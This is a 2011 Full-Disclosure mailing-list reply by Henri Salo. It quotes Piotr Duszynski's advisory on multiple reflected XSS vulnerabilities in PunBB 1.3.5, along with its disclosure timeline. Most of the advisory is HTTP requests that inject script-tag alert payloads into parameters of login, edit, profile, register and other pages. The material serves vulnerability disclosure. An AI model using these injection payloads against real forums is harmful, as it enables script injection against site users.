[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20110917122853.GA7438@foo.fgeek.fi>
Date: Sat, 17 Sep 2011 15:28:53 +0300
From: Henri Salo <henri@...v.fi>
To: Piotr Duszynski <piotr@...zynski.eu>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: PunBB PHP Forum - Multiple XSS
On Fri, Sep 16, 2011 at 06:43:47PM +0200, Piotr Duszynski wrote:
> =======================================================================
> PunBB PHP Forum - Multiple XSS
> =======================================================================
>
> Affected Software : PunBB PHP Forum
> Severity : Medium
> Local/Remote : Remote
> Author : @drk1wi
>
> [Summary]
>
> Just for those whom it might concern.
> These vulnerabilities have been identified for the latest (clean
> version 1.3.5) during one of my penetration tests.
>
> [Vulnerability Details]
>
>
> GET
> /login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/><script>alert(oink)</script>
> GET
> /misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/><script>alert(oink)</script>
>
> POST /delete.php?id=>"'><script>alert(oink)</script>
> form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_confirm=>"'><script>alert(oink)</script>&delete=>"'><script>alert(oink)</script>
>
> POST /edit.php?id=>"'><script>alert(oink)</script>
> form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>
>
> POST /login.php?action=>"'><script>alert(oink)</script>
> form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_email=>"'><script>alert(oink)</script>&request_pass=>"'><script>alert(oink)</script>
>
> POST /misc.php?email=>"'><script>alert(oink)</script>
> form_sent=>"'><script>alert(oink)</script>&redirect_url=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_subject=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>
>
> POST
> /profile.php?action=>"'><script>alert(oink)</script>&id=>"'><script>alert(oink)</script>
> form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_old_password=>"'><script>alert(oink)</script>&req_new_password1=>"'><script>alert(oink)</script>&req_new_password2=>"'><script>alert(oink)</script>&update=>"'><script>alert(oink)</script>
>
> POST /register.php?action=>"'><script>alert(oink)</script>
> form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_username=>"'><script>alert(oink)</script>&req_password1=>"'><script>alert(oink)</script>&req_password2=>"'><script>alert(369448)</script>&req_email1=>"'><script>alert(oink)</script>&timezone=>"'><script>alert(oink)</script>®ister=>"'><script>alert(oink)</script>
>
>
> [Time-line]
>
> 20/08/2011 - Vendor notified
> 02/09/2011 - No e-mail reply and BAN on Forum
> ??? - Vendor patch release
> 16/09/2011 - Public disclosure
>
> [Fix Information]
>
>
> Cheers,
> Piotr Duszynski (@drk1wi)
> http://sharpsec.net
>
> X. LEGAL NOTICES
>
> Copyright (c) 2011 Piotr "drk1wi" Duszynski
>
> Permission is granted for the redistribution of this alert
> electronically. It may not be edited in any way without mine express
> written consent. If you wish to reprint the whole or any
> part of this alert in any other medium other than electronically,
> please email me for permission.
>
> Disclaimer: The information in the advisory is believed to be accurate
> at the time of publishing based on currently available information. Use
> of the information constitutes acceptance for use in an AS IS
> condition.
> There are no warranties with regard to this information. Neither the
> author nor the publisher accepts any liability for any direct,
> indirect,
> or consequential loss or damage arising from use of, or reliance on,
> this information.
I also reported these vulnerabilities to PunBB PHP Forum developers using http://punbb.informer.com/bugreport.php. Let's see what they answer. Have they replied anything to you yet?
Best regards,
Henri Salo
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists